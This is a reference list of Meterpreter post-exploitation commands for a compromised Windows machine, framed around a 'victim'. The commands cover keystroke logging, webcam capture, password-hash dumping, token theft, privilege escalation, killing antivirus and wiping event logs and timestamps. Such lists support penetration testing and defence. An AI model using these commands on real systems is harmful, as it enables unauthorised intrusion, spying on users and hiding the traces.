Some Important Meterpreter Commands After You Have Exploited a Machine
Meterpreter Commands
1. sysinfo -----> shows the system build x86 or x64, language version, build...etc
2. run checkvm ------> checks whether the victim is running in a virtual machine or natively.
3. route --------> Dumps the routing table to the screen and shows how the subnet has been configured...etc
4. run get_application_list -------> This shows you the applications installed on the remote PC
5. uictl ---------> Control Some of the User Interface Components
6. idletime -----> shows how long the victim has not been active on the computer.
7. getpid ---------> This gets the process ID of the process you are currently running in.
8. getuid -------> This will show you the system identity, i.e. who you are running as, such as SYSTEM.
9. ps ------> This shows all the processes running on the victim as well as their PIDs
10. run get_env -------> This will give you a lot of info on the system
11. ifconfig and ipconfig -----> Find out the IP address and see how many adapters are enabled.
12. ? ------> Shows a list of different commands.
13. getsystem -----> attempts to give you local SYSTEM privileges
14. reboot ------> Reboot the remote machine
15. sc config process_name start= disabled --------> stops a process from starting on the next system reboot. "process_name" is the name of the process you want to disable.
16. clearev -------> Wipes all event logs.
17. execute -f cmd.exe -H -c ------> Open a command prompt on a hidden channel.
18. interact 1 ------> interact with a channel. "1" will be replaced with the channel you want to interact with.
19. download -------> This command will download the specified file. "Example" download c:\\boot.ini
20. upload --------> upload files to the victim machine
21. portfwd ------> forward a local port to a remote service
22. run getgui -e ------> this will enable remote desktop on the victim.
23. run gettelnet -e -------> To enable telnet on the remote machine.
24. run getcountermeasure ------> checks the security configuration on the exploited machine and can disable countermeasures such as AV, firewalls, etc.
25. run killav -------> designed to kill most AVs that are running as a service on the exploited machine. Works on some but not all AVs.
26. run get_local_subnets ------> used to get the local subnet of the victim machine.
27. run hostedit -------> allows the attacker to add entries to the Windows hosts file. Because Windows checks the hosts file first, traffic can be diverted to a fake entry
28. run remotewinenum -------> designed to enumerate the target system with the wmic command
30. run winenum -------> used for system enumeration. It will dump tokens, hashes, and issue both net and wmic commands
31. run scraper --------> used for grabbing additional system information not included in the other system enumerating scripts, such as the “entire registry.”
32. migrate --------> Migrate to Another Process such as explorer.exe so you don't lose your session.
33. cat -------> Read the Contents of a File to the Screen
34. background "or ctrl + z" --------> Background the Current Session
35. irb -------> Drop into irb Scripting Mode
36. interact --------> Interact with a Channel
37. load ------> Load One or More Meterpreter Extensions.
38. channel -------> Displays Info About Active Channels
39. bgkill ---------> Kill a Background Meterpreter Script
40. close --------> Close a Channel
41. enumdesktops --------> List All Accessible Desktops and Window Stations
42. getdesktop -------> Get the Current Meterpreter Desktop
43. lpwd --------> Print Local Working Directory
44. ls --------> list Files
45. rm --------> Delete the Specified File
46. search --------> Search for Files.
47. upload ------> Upload File to Target
48. keyscan_start --------> Start Capturing Keystrokes
49. keyscan_stop --------> Stop Capturing Keystrokes
49. keyscan_dump --------> Dump the Keystroke Buffer
50. screenshot --------> Screenshot of the GUI
51. setdesktop ---------> Change the Meterpreter's Current Desktop.
52. getprivs ---------> Attempt to Enable All Privileges Available to the Current Process
53. kill --------> Terminate a Process "Example" kill 1834
54. reboot --------> Reboots the Remote Computer
55. reg ---------> Interact with the Remote Registry.
56. rev2self ---------> Calls RevertToSelf() on the Remote Machine
57. shell --------> Drop into a system shell.
58. shutdown --------> Shuts Down the Remote Computer
59. steal_token ------> Attempt to Steal an Impersonation Token from the Process
60. webcam_list --------> List webcams
61. webcam_snap -------> Take a snapshot from the specified webcam.
62. hashdump --------> Dumps the content of the SAM Database.
63. timestomp -------> Manipulates MACE Attributes
64. execute ------> Execute a command.
65. info --------> Display info about active post module.
66. quit --------> Terminate the meterpreter session.
67. getwd -------> Print Working Directory
68. mkdir -------> make directory.
69. pwd -------> print working directory.
70. drop_token -------> Relinquishes Any Active Impersonation Token
71. rmdir --------> remove directory.
72. del -------> delete file "Example" del passwords.txt